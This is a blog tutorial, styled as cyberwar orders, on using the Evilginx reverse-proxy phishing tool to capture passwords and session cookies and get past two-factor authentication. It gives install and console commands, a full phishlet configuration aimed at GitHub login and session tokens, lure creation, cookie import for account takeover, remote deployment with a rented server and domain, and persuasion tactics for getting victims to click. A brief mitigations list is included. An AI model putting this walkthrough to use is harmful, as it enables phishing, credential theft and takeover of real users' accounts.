top of page
Writer's pictureotw

Cyberwar Mission: Hack the Adversary's 2FA Protected Account

Updated: Jul 17

To prevent password stealing and password hacking, many applications have adopted 2FA authentication. 2FA or 2-factor authentication requires that the user authenticate not only using a username name and password (1-factor authentication but also a second authentication method such as sending a one-time password (2-factor authentication) to an authenticated device such as a phone. This makes it much more difficult for the hacker to compromise accounts such as email, Facebook, Twitter, etc.


In many cases, the fastest and easiest route (always start with the fastest and easiest. No point in developing a zero-day exploit to compromise weak accounts) is to social engineer the end user. Nearly all the major hacking groups including the NSA and Sandworm (one of Russia's elite hacking organizations) use social engineering to enter recalcitrant systems (I get social engineering attempts nearly every day from the Russians). Don't overlook social engineering a as nearly 80% of all successful hacks have a social engineering element.


In this tutorial, we will look at evilginx can help us to obtain the credentials from an adversary in a cyberwar scenario.


Hey, private. Whoever controls the flow of information controls the world. So, you need to take over the account of the enemy unit leader. To accomplish this task, you will use one of the most powerful tools in our arsenal - Evilginx, a sophisticated phishing tool.


As you should already know, "Phishing" is when someone tries to steal important information like usernames, passwords, credit card numbers, or bank details. This is often done by pretending to be a trustworthy source, like a bank or a popular website, and tricking people into giving them their sensitive information. It's like how a fisherman uses bait to catch fish – the attacker uses a fake message or website to lure in their victims.


Evilginx takes phishing to the next level by intercepting communication between users and legitimate websites. It sets up a "man-in-the-middle" attack, meaning it secretly intercepts data passing between a user and a website. When a user enters their login details on what they believe to be a trusted website, Evilginx captures this information in real-time.


What makes Evilginx particularly powerful is its ability to handle sophisticated attacks. For example, it can bypass two-factor authentication (2FA). Normally, 2FA adds an extra layer of security by requiring users to enter a temporary code sent to their phone/email or biometrics (fingerprint scans or facial recognition) in addition to their password. However, Evilginx can present a fake 2FA prompt to the user after they enter their initial credentials, thereby tricking them into entering their 2FA code as well.


How Evilginx Works


Before you go into battle, you need to understand your weapon, know how to keep it running smoothly and grasp its strengths and weaknesses. So let's take a look at how Evilginx works.

Evilginx doesn’t serve its own HTML look-alike pages like in traditional phishing attacks. Instead, Evilginx becomes a web proxy. Every packet, coming from the victim’s browser, is intercepted, modified, and forwarded to the real website. The same happens with response packets, coming from the website; they are intercepted, modified, and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim side, everything looks as if they are communicating with a legitimate website. The user has no idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies.



Here’s how the process works:

  • The attacker creates a fake link to their own server with Evilginx.

  • They send this link to the victim through email or messages.

  • When the victim clicks the link, they see a fake login page made by Evilginx.

  • The victim enters their username and password. If there’s two-factor authentication, they complete that too.

  • After logging in, the victim gets redirected to the real website.

  • Now, the attacker has the victim’s email, password, and session cookies. They can use these to fully control the victim’s account, even bypassing two-factor authentication.


Now, let's explore the main features of this software:

  1. Evilginx serves as a platform for executing phishing attacks on different online services.

  2. A significant capability of Evilginx is its ability to circumvent two-factor authentication (2FA).

  3. Evilginx can intercept session cookies as well.

  4. It's designed with modularity and customization in mind, allowing attackers to tailor it for various phishing campaigns and integrate it seamlessly with other tools and frameworks.


However, it's important to remember that there are effective ways to mitigate the risks posed by Evilginx:

  1. Developers can implement domain verification for the current page being viewed.

  2. Verification codes can be dynamically obfuscated.

  3. Implementing TLS session resumption adds an extra layer of security.

  4. Including secret tokens with POST requests for login credentials enhances protection.

  5. When using Evilginx, all request packets include the HTTP header “X-Evilginx,” which can help detect its presence.

It's crucial to note that major tech companies like Google are aware of Evilginx and continually deploy various protective measures against it.


Installation


Generally, in order to make Evilginx works properly, you need to register a domain and rent a virtual server. But it's possible to test basic functionality without all this in the Kali Linux virtual machine.

You can install Evilginx in two ways: either by building it from the source code or, if you're using Kali, downloading it from the repository. For the second option, it's enough to run the following command:

kali> sudo apt install evilginx2 -y


After installing any software, it's a good practice to open its help screen if you haven't used it before.



Here you should pay attention to the "-developer" option, which will generate SSL certificates for all hostnames. Otherwise, if you haven't purchased any domains yet, you won't be able to perform the test (you'll just get an error about the failure to establish a secure connection). The second important option is the path to your phishlets. Phishlets are small YAML files, used to configure Evilginx for targeting specific websites. By default, phishlets reside in the root directory of Evilginx binary. If you installed Evilginx from the Kali repository, the default path is /usr/share/evilginx/phishlets/.



Local Deployment


Now we need a domain. I'm assuming that you don't have it yet, so let's come up with one and point our domain through the /etc/hosts file to the localhost IP. Hosts file primary function is to map hostnames to IP addresses locally, allowing the system to resolve domain names without querying external DNS servers.

In my case, I'll use the domain "security-update-v102.com". To edit the host file, you can use any text editor you like. We need to specify the IP address, in this case 127.0.0.1 or localhost and domain.



Now let's get back to Evilginx.


After installation, only one phishlet "example" is displayed and it's in the disabled status. Also when you start Evilginx for the first time you will see warning messages about the server domain and server ipv4 being not set.


This is the first thing you need to set up.


: config domain <domain>

: config ipv4 <IP>



To avoid using an example configuration file, I found a pre-built one developed by "audibleblink", specifically tailored for GitHub:



min_ver: '2.3.0'

proxy_hosts:

  - {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}

  - {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}

  - {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}

  - {phish_sub: 'github', orig_sub: 'github', domain: 'github.com'}

sub_filters:

  - {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}

auth_tokens:

  - domain: '.github.com'

    keys: ['logged_in', 'dotcom_user']

  - domain: 'github.com'

    keys: ['user_session', '_gh_sess']

credentials:

  username:

    key: 'login'

    search: '(.*)'

    type: 'post'

  password:

    key: 'password'

    search: '(.*)'

    type: 'post'

login:

  domain: 'github.com'

  path: '/login'


To use it, you need to create a file with a YAML extension in the directory where your other phishlets are located. There are also subdomains "api" and "github" in proxy_hosts, so you need to direct them through the hosts file as well.



The next step is to set up a hostname for your phishing URL. You can pick whatever hostname you want with as many subdomains as you want, under the condition that it ends with the top-level domain you set up with the config domain.


In my case, I'll leave it the same as the server one.


: phishlets hostname <phishlet> <domain>



Now it's time to activate the phishlet.


: phishlets enable <phishlet>


After entering a "phishlets" command, we can see that the status is changed and the hostname is added.



The next step is to create a lure. Lures are essentially pre-generated phishing links, which you will be sending out to your target. It has to be assigned to a specific phishlet.


: lures create <phishlet>


The lure you create will automatically get an ID assigned. To check the full path by ID, you can use the command:


: lures get-url <phishlet>



Now you can open this link in a browser after clearing the cache. You will receive the following warning because a self-signed SSL certificate is being used and the browser doesn't trust it.



You need to manually configure your browser to trust certificates from Evilginx. To do this, go to the settings and upload the file at the path: /home/kali/.evilginx/crt/ca.crt




After that, you can reload your phishing page again.



In the terminal, you can see a notification that someone has visited your lure.


If the victim logs in, you will receive a login, password, and session cookies.



Once users open your phishing lure link, a new phishing session will be created for them to track the progress of the phishing attempt. When they send their credentials over the tracked parameters, these credentials will be stored.


By entering the ID, we can view in more detail.


You can now install a browser extension for editing cookies and import the data.


After restarting the page, you will be logged into the victim's account.


Cyberwar Remote Deployment


Alright, private, you've got the basic skills to work with Evilginx, now let's move on to the remote deployment of this software.


You need to purchase:


  • Virtual server (AWS, DigitalOcean, Godaddy, or any other provider)

  • Domain name (Namecheap, Hostinger, Bluehost, etc.)


After purchasing a VPS, you will have a public IPv4 address to which you need to direct the domain. To do this, you need to find the DNS zone editing section at your domain registrar and direct the necessary subdomains using the A records, as we did through the hosts file. For example, I'm going to work with the Github phishlet later on, so it's worth pointing the "api" and "github" subdomains because they are specified in the YAML configuration file.



But after adding it, you need to wait from 2 to 48 hours for the DNS zone to update so that our changes become active. You can keep up with the updates by following the link: https://dnschecker.org/



Evilginx installation on a virtual server looks exactly the same, you can change your operating system's repositories to Kali and download the software from there or download it from Github.


The Art Of Social Engineering


Now let's take a closer look at social engineering and what concepts you can use to encourage a target to click on a link. Among the most common social engineering vectors in information technology are:

  • Phishing - Sending out many emails to trick a few people into clicking on harmful links. This is probably the most common social engineering attack, but increasingly less effective.

  • Spear Phishing - Targeting a single individual with email attacks. Typically involves extensive OSINT to understand the target's interests, needs, and motivations. When executed correctly, this approach can be highly effective.

  • Whaling - An email targeting a very powerful person.

  • Vishing - Very similar to phishing, but done with the voice calls.

  • Baiting - similar to phishing, where the attacker lures victims with the promise of a large payoff.

  • Quid Pro Quo - Latin for 'something for something.' In this social engineering attack, the target is promised a benefit in exchange for information or another service.


In any case, you should always conduct good reconnaissance and choose the right vector.



The next important step is to choose an influence strategy, and here are some key ones:

  • Reciprocity - People are naturally inclined to be helpful, so if an attacker offers something to the target, the target will often feel obliged to reciprocate by offering something in return when requested.

  • Obligation: The attacker creates a sense of obligation by offering kindness or friendliness.

  • Concession: Similar to reciprocity, the attacker requests more than needed and settles for their desired outcome (for instance, asking for $200 when aiming for $100 and persuading the target to agree to $100).

  • Scarcity: The attacker fabricates scarcity to prompt the target to act quickly before the opportunity is gone.

  • Authority: The attacker assumes authority to compel the target to disclose information or take action. “Hi this is the help desk and we are doing a system update. We need your username and password to update the new system.”

  • Consensus: The attacker convinces the target that "everyone knows" or "everyone does" something to persuade them to comply. Such as everyone knows that bitcoin to going to $1,000,00/per bitcoin.


If you want to learn more about The Art of Social Engineering here is our course: https://hackersarise.thinkific.com/courses/the-art-of-social-engineering


Summary


That's all, private, for today. Social engineering is one of the most powerful tools of any hacker. Don't overlook it, as it will help you on your way to becoming a cyberwarrior of the first order!



2,116 views
bottom of page